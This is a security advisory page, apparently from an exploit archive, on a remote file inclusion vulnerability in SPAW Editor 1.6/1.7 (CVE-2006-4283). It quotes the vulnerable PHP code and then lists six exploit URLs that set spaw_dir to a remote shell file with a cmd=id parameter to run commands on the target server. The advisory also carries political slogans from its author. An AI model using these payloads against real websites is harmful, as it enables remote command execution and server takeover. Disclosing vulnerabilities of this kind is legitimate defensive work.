Spaw Editor Remote Include Vulnerability

2006-08-24 / 2006-08-25
Credit: botan
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-4283
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

* Kurdish Security Advisory * Spaw Editor Remote Include Vulnerability * Our Party is PKK, Our Army HPG, We will Earn * contact ? : irc.gigachat.net #kurdhack & botan (at) linuxmail (dot) org [email concealed] * Risk : High * Class : Remote * Script : Spaw Editor * Version : v1.6 and v1.7 * Site : www.solmetra.com <? // include wysiwyg config include '../config/spaw_control.config.php'; include $spaw_root.'class/lang.class.php'; $theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:$HTTP_GET_VARS['theme ']; $theme_path = $spaw_dir.'lib/themes/'.$theme.'/'; $l = new SPAW_Lang($HTTP_GET_VARS['lang']); $l->setBlock('colorpicker'); ?> http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?&cmd= id http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell .txt&cmd=id http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?&cm d=id http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell .txt?&cmd=id http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?& cmd=id http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?&cmd =id Speacial MSG! : The Turk state is the aggressor behavior Don't stay quite. Hear the Kurdish people is scream be late.. Stop the Turkey Military!


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top